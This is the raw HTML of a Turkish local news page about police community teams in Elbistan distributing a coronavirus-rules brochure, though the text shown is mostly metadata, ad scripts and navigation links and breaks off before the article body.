
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>TDP ekipleri esnaflara 14 kural broşürü dağıttı</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan&#039;da Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri ilçedeki esnaflar ve vatandaşlarla Suriyeli mülteticilere maske ve sosyal mesafeye"> <meta name="keywords" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <meta name="news_keywords" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <meta property="og:description" content="Elbistan&#039;da Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri ilçedeki esnaflar ve vatandaşlarla Suriyeli mülteticilere maske ve sosyal mesafeye"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <meta name="twitter:description" content="Elbistan’da Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri, ilçedeki esnaflar ve vatandaşlarla Suriyeli mülteticilere, maske ve sosyal mesafeye uyalım projesi kapsamında koronavirüs salgınına karşı uyulması gereken 14 kuralın yer aldığı broşür dağıttı."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" /> <meta itemprop="headline" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2020-09-15T17:45:19+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="TDP ekipleri esnaflara 14 kural broşürü dağıttı" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.4683</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">8.8495</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">470.464</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1111</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehitler-ve-gaziler-derneginden-mhpye-hayirli-olsun-ziyareti-h67761.html" title="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti" >Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/salginin-elbistandaki-durumu-masaya-yatirildi-h67759.html" title="Salgının Elbistan’daki durumu masaya yatırıldı" >Salgının Elbistan’daki durumu masaya yatırıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html" title="Ne canımız yansın ne de cebimiz!" >Ne canımız yansın ne de cebimiz!</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/papatyam-anaokuluna-tseden-onayli-okulum-temiz-belgesi-h67757.html" title="Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi" >Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/emyoda-3d-yazici-ile-uretilen-siperlikler-teslim-edildi-h67756.html" title="EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi" >EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/doga-ve-hayvanlari-koruma-polisinden-yarali-sahine-yardim-eli-h67755.html" title="Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli" >Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-keske-yapmasaydim-dememek-icin-tedbiri-elden-birakmayin-h67749.html" title="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”" >Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html" title="Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi" >Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ilkogretim-haftasi-kutlaniyor-h67747.html" title="İlköğretim Haftası kutlanıyor" >İlköğretim Haftası kutlanıyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/gelecek-partisinin-yeni-baskani-kursat-yuksel-oldu-h67744.html" title="Gelecek Partisi’nin yeni başkanı Kürşat Yüksel oldu" >Gelecek Partisi’nin yeni başkanı Kürşat Yüksel oldu</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="07e7c64077fc934d459638d47cedc31e3b0941b7" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="TDP ekipleri esnaflara 14 kural broşürü dağıttı" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html" title="Necati Köleli 88 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/necati_koleli_88_yasinda_h67754_059a3.jpg" alt="Necati Köleli 88 yaşında," /> Necati Köleli 88 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-hicazlioglu-seyar-81-yasinda-h67753.html" title="Mehmet Hicazlıoğlu (Seyar) 81 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/mehmet_hicazlioglu_seyar_81_yasinda_h67753_b52b9.jpg" alt="Mehmet Hicazlıoğlu (Seyar) 81 yaşında" /> Mehmet Hicazlıoğlu (Seyar) 81 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/makbule-sakalar-80-yasinda-h67752.html" title="Makbule Şakalar 80 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/makbule_sakalar_80_yasinda_h67752_b84f2.jpg" alt="Makbule Şakalar 80 yaşında" /> Makbule Şakalar 80 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/kerim-kisaca-h67751.html" title="Kerim Kısaca"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/kerim_kisaca_h67751_a2ca6.jpg" alt="Kerim Kısaca" /> Kerim Kısaca</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/sehitler-ve-gaziler-derneginden-mhpye-hayirli-olsun-ziyareti-h67761.html" title="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/sehitler_ve_gaziler_derneginden_mhpye_hayirli_olsun_ziyareti_h67761_366b5.jpg" alt="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti" /> Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html" title="TDP ekipleri esnaflara 14 kural broşürü dağıttı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" alt="TDP ekipleri esnaflara 14 kural broşürü dağıttı" /> TDP ekipleri esnaflara 14 kural broşürü dağıttı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/salginin-elbistandaki-durumu-masaya-yatirildi-h67759.html" title="Salgının Elbistan’daki durumu masaya yatırıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/salginin_elbistandaki_durumu_masaya_yatirildi_h67759_2c00a.jpg" alt="Salgının Elbistan’daki durumu masaya yatırıldı" /> Salgının Elbistan’daki durumu masaya yatırıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html" title="Ne canımız yansın ne de cebimiz!"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/ne_canimiz_yansin_ne_de_cebimiz_h67758_85f3a.jpg" alt="Ne canımız yansın ne de cebimiz!" /> Ne canımız yansın ne de cebimiz!</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a 